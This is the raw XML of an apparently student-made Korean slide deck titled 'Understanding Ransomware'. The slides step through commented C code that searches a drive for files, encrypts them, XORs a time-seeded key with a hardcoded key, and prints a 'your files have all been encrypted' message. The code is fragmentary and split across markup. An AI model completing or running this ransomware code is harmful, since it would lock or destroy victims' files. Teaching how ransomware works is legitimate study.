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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId2"/>
    <p:sldId id="270" r:id="rId3"/>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="289" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="291" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="284" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="배달의민족 한나" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bradley Hand ITC" panose="03070402050302030203" pitchFamily="66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ucida Handwriting" panose="03010101010101010101" pitchFamily="66" charset="0"/>
      <p:regular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  <p:embeddedFont>
      <p:font typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128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함초롬돋움" panose="020B0604000101010101" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="휴먼모음T" panose="02030504000101010101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4D43AC"/>
    <a:srgbClr val="E3E3E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761A-9F7D-4AA8-905E-756537C1B3DC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BB4A-ED6B-4923-A4AE-A8526AE1C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4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8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8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860800" y="0"/>
            <a:ext cx="83312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10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4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E8DF-17A4-4CAA-8E75-CD2A532822F8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AC52-4B33-445C-9826-D3ACF9460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0111" y="2411762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Understanding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724" y="2796482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Ransomware</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="66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81886" y="5387095"/>
            <a:ext cx="1834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1525261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김동찬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1525273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김영진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1525551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김다은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1525181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박창준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1524873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Lucida Handwriting" panose="03010101010101010101" pitchFamily="66" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>주성호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  <a:p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Lucida Handwriting" panose="03010101010101010101" pitchFamily="66" charset="0"/>
              <a:cs typeface="Verdana" panose="020B060403050404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176703" y="3584267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4652218" y="2411762"/>
            <a:ext cx="406400" cy="3834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-#1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암호화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파일 찾기 </a:t>
            </a:r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파일 암호화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AF735-9127-463D-9FD7-C49FF6E3DB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108173" y="1630017"/>
            <a:ext cx="7845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else {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do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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1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("%s\n", file_search.name);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encrypt(file_search.name, path);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} while (_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findnext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h_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) == 0); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 처음을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시작햇으면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en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>next -&gt; next -&gt; next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 계속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>찾아가는함수</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findclose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h_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>끝나면 메모리 해제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-#1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암호화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#2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 값 만들기 </a:t>
            </a:r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 값 암호화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B417B-EACD-42A6-B751-7AEBE65547CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909391" y="727282"/>
            <a:ext cx="83753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stdio.h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stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// rand, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>srand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 라이브러리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time.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 라이브러리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string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 라이브러리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char temp[10];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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[10];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char key[101] = { "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y#DwGZ#jYbZz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*-@py_y3Jr+Uz3g7T9nBP2cFNb8cU8U_m_hxRfLNsP2Qmv@!XTqca$LM6s5N5JV$5qahLpe74x*J4NA6Zq#VdnFh" };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암호키</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EncryptKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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srand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>((unsigned)time(NULL));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> //rand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값을 현시각에 따라 설정해준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시각은 매순간 다르므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값은 항상 달라짐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sprintf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the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "%d", rand() % 1000000000 + 100000000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기존에 알고있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 달리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 해당 메모리에 값을 출력함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500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sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   // 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>번소스에 들어가는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 이 구문에 의해 암호화된 값이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500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sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(temp, "%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key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위의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값은 또다시 암호화 될 것이기 때문에 암호화되기 전의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 저장하려는 목적</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500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sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>번 소스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화 프로그램</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 활용될 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500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int 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for (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 = 0; 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strlen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the_key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++){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the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[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] ^= key[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ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화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-#1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암호화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#3 main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함수와 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1A172-7826-4242-A343-E64E2B0628AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="1166842"/>
            <a:ext cx="78187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 main()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int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EncryptKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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char path[100] = "F:/";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rgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 암호화할 파일을 찾겠다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(path);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 err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일찾으면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 암호화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for (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= 0;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&lt;30;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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1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("\n");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puts("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>당신의 파일들이 모두 암호화 되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!");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("key:%s", temp);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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>번 소스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화 프로그램</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 활용될 예정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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system("pause&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>결과값을 띄우기 위해 일시정지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return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-#2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11F62-2F45-4D46-8820-6EB7C34D61DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015409" y="1108136"/>
            <a:ext cx="8083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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdlib.h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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[10];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char key[101] = { "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y#DwGZ#jYbZz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*-@py_y3Jr+Uz3g7T9nBP2cFNb8cU8U_m_hxRfLNsP2Qmv@!XTqca$LM6s5N5JV$5qahLpe74x*J4NA6Zq#VdnFh" }; </a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호키</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EncryptKey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int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for (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= 0;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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strlen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the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r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] ^= key[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];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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용자에게서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값을 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>값을 토대로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화할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ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
